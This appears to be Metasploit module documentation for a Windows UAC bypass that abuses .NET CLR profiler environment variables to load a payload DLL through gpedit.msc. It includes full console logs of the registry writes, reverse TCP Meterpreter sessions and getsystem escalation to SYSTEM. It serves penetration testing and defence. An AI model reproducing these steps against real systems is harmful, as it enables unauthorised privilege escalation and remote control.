documentation/modules/exploit/windows/local/bypassuac_dotnet_profiler.md
Microsoft Windows allows for the automatic loading of a profiling COM object during the launch of a CLR process based on certain environment variables ostensibly to monitor execution. In this case, we abuse the profiler by pointing to a payload DLL that will be launched as the profiling thread. This thread will run at the permission level of the calling process, so an auto-elevating process will launch the DLL with elevated permissions. In this case, we use gpedit.msc as the auto-elevated CLR process, but others would work, too.
use exploit/windows/local/bypassuac_dotnet_profiler.PAYLOAD and configure it correctly.set DisablePayloadHandler true.SESSION value is set to the existing session identifier.run.msf exploit(windows/local/bypassuac_dotnet_profiler) > run
[*] Started reverse TCP handler on 192.168.135.168:4444
[*] UAC is Enabled, checking level...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] win_dir = C:\Windows
[*] tmp_dir = C:\Users\msfuser\AppData\Local\Temp
[*] exploit_dir = C:\Windows\System32\
[*] target_filepath = C:\Windows\System32\gpedit.msc
[*] Making Payload
[*] payload_pathname = C:\Users\msfuser\AppData\Local\Temp\vehxxpkdx.dll
[*] UUID = a47dbe47-41a6-42ed-95a0-e2cc4710a75a
[*] Writing to HKCU\Software\Classes\CLSID\{a47dbe47-41a6-42ed-95a0-e2cc4710a75a}\InprocServer32
[*] Writing COR_PROFILER to HKCU\Environment
[*] Writing COR_ENABLE_PROFILING to HKCU\Environment
[*] Writing COR_PROFILER_PATH to HKCU\Environment
[*] Uploading Payload to C:\Users\msfuser\AppData\Local\Temp\vehxxpkdx.dll
[*] Payload Upload Complete
[*] Launching C:\Windows\System32\gpedit.msc
[!] This exploit requires manual cleanup of 'C:\Users\msfuser\AppData\Local\Temp\vehxxpkdx.dll!
[*] Please wait for session and cleanup....
[*] Sending stage (206403 bytes) to 192.168.132.187
[*] Meterpreter session 5 opened (192.168.135.168:4444 -> 192.168.132.187:49234) at 2019-11-15 12:14:41 -0600
[*] Removing Registry Changes
[*] Deleting HKCU\Software\Classes\CLSID\{a47dbe47-41a6-42ed-95a0-e2cc4710a75a}\InprocServer32 key
[*] Deleting COR_PROFILER from HKCU\Environment key
[*] Deleting COR_ENABLE_PROFILING from HKCU\Environment key
[*] Deleting COR_PROFILER_PATH from HKCU\Environment key
[*] Registry Changes Removed
meterpreter > sysinfo
Computer : WIN7X64-SP1
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: WIN7X64-SP1\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
msf exploit(multi/handler) > use exploit/windows/local/bypassuac_dotnet_profiler
msf exploit(windows/local/bypassuac_dotnet_profiler) > set session 6
session => 6
msf exploit(windows/local/bypassuac_dotnet_profiler) > show options
Module options (exploit/windows/local/bypassuac_dotnet_profiler):
Name Current Setting Required Description
---- --------------- -------- -----------
PAYLOAD_NAME no The filename to use for the payload binary (%RAND% by default).
SESSION 6 yes The session to run this module on.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.135.168 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x64
msf exploit(windows/local/bypassuac_dotnet_profiler) > run
[*] Started reverse TCP handler on 192.168.135.168:4444
[*] UAC is Enabled, checking level...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] win_dir = C:\Windows
[*] tmp_dir = C:\Users\msfuser\AppData\Local\Temp
[*] exploit_dir = C:\Windows\System32\
[*] target_filepath = C:\Windows\System32\gpedit.msc
[*] Making Payload
[*] payload_pathname = C:\Users\msfuser\AppData\Local\Temp\LNpAorHj.dll
[*] UUID = d472ba96-3dfc-432c-8ad2-f44ada2a39ec
[*] Writing COR_PROFILER to HKCU\Environment
[*] Writing COR_ENABLE_PROFILING to HKCU\Environment
[*] Writing COR_PROFILER_PATH to HKCU\Environment
[*] Uploading Payload to C:\Users\msfuser\AppData\Local\Temp\LNpAorHj.dll
[*] Payload Upload Complete
[*] Launching C:\Windows\System32\gpedit.msc
[!] This exploit requires manual cleanup of 'C:\Users\msfuser\AppData\Local\Temp\LNpAorHj.dll!
[*] Please wait for session and cleanup....
[*] Sending stage (206403 bytes) to 192.168.132.125
[*] Meterpreter session 7 opened (192.168.135.168:4444 -> 192.168.132.125:49683) at 2019-11-15 12:18:54 -0600
[*] Removing Registry Changes
[*] Deleting COR_PROFILER from HKCU\Environment key
[*] Deleting COR_ENABLE_PROFILING from HKCU\Environment key
[*] Deleting COR_PROFILER_PATH from HKCU\Environment key
[*] Registry Changes Removed
meterpreter > sysinfo
Computer : DESKTOP-D1E425Q
OS : Windows 10 (10.0 Build 17134).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: DESKTOP-D1E425Q\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >